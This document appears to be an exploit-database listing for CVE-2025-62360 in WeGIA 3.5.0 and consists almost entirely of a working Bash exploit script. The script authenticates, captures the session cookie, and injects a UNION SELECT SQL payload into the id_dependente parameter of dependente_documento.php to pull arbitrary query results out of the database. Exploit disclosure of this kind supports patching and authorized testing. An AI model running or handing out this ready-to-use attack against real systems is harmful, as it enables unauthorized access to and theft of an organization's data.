WeGIA 3.5.0 Exploit, SQL InjectionGo BackDownload

# Exploit Title: WeGIA 3.5.0 - SQL Injection
# Date: 2025-10-14
# Exploit Author: Onur Demir (OnurDemir-Dev)
# Vendor Homepage: https://www.wegia.org
# Software Link: https://github.com/LabRedesCefetRJ/WeGIA/
# Version: <=3.5.0
# Tested on: Local Linux (localhost/127.0.0.1)
# CVE : CVE-2025-62360
# Advisory / Reference: https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mwvv-q9gh-gwxm
# Notes: Run this script ONLY on a local/test instance you own or are authorized to test.
# ============================================================

if [ -z "$4" ]; then
	# Usage prompt if required arguments are missing
	echo "Usage: $0 <target-url> <user> <password> <payload>"
	echo "Example: $0 http://127.0.0.1/WeGIA/ \"admin\" \"wegia\" \"version()\""
	exit 1
fi

url="$1"
user="$2"
pass="$3"
payload="$4"

# Check if URL format is valid (basic regex)
# This is a basic sanity check for the URL string format.
if ! [[ "$url" =~ ^http?://[a-zA-Z0-9._-]+ ]]; then
  echo "⚠️  Invalid URL format: $url"
  exit 1
fi

# Perform login request (multipart/form)
# -s silent, -w "%{http_code}" will append HTTP code to response
# -D - prints response headers to stdout, combined with body in login_response
login_response=$(curl -s -w "%{http_code}" "$url/html/login.php" \
  -D - \
  -X POST \
  -F "cpf=${user}"\
  -F "pwd=${pass}")

# Extract last 3 chars as HTTP status code from the combined response
login_status_code="${login_response: -3}"

# If login did not return a 302 redirect, handle error cases
if [ "$login_status_code" -ne 302 ]; then

	# If curl couldn't connect, curl may return 0 or empty status code
	if [ "$login_status_code" -eq 0 ] || [ -z "$login_status_code" ]; then
		echo "❌ Unable to reach URL: $url"
		exit 1
	fi

	# Otherwise report unexpected login status
	echo "Error: Received HTTP status code from login: $login_status_code"
	exit 1
fi

# Extract the Location header from the login response headers
# Using awk to find the first Location header (case-insensitive)
login_location=$(echo "$login_response" | awk -F': ' 'BEGIN{IGNORECASE=1} /^Location:/{print substr($0, index($0,$2)); exit}' | tr -d '\r')

# Check username and password correctness using Location header content
# If the Location does not include home.php, consider login failed.
if [[ "$login_location" != *"home.php"* ]]; then

	# If Location contains "erro" assume wrong credentials; otherwise unknown error
	if [[ "$login_location" == *"erro"* ]]; then
		echo "Error: Wrong username or password!"
	else
		echo "Error: Unknown Error!"
	fi

	exit 1
fi


# Extract Set-Cookie header (first cookie) and keep only "name=value"
# tr -d '\r' removes possible CR characters
set_cookie=$(echo "$login_response" | awk -F': ' 'BEGIN{IGNORECASE=1} /^Set-Cookie:/{print substr($0, index($0,$2)); exit}' | tr -d '\r')
set_cookie=$(echo "$set_cookie" | cut -d';' -f1)


#Exploit Vulnarbility
# (The following performs the SQL injection request using the cookie obtained above)
# The payload variable is used verbatim in the id_dependente parameter.
# Ensure payload is provided safely in the script invocation and that you are authorized to test.

# Execute the curl command and capture the output and status code
response=$(curl -s -w "%{http_code}" "$url/html/funcionario/dependente_documento.php" -d "id_dependente=1 UNION+SELECT 'a','b',$payload;#" -b "$set_cookie;" -H "Content-Type: application/x-www-form-urlencoded")

# Extract the HTTP status code (last 3 characters)
status_code="${response: -3}"


# Extract the body (everything except the last 3 characters)
body="${response:0:-3}"


# If the exploit request returned HTTP 200, try to extract id_doc
if [ "$status_code" -eq 200 ]; then

	# Prefer a robust JSON extractor if available; this line uses grep -Po to capture the id_doc value including quotes.
	# Note: This grep returns the quoted string (e.g. "11.8.3-MariaDB-1+b1 from Debian").
	clear_response=$(echo "$body" | grep -Po '"id_doc": *\K"[^"]*"')

	# Print the extracted value (or empty if not found)
	echo "$clear_response"
else
	# Non-200 status handling
	echo "Error: Received HTTP status code $status_code"
fi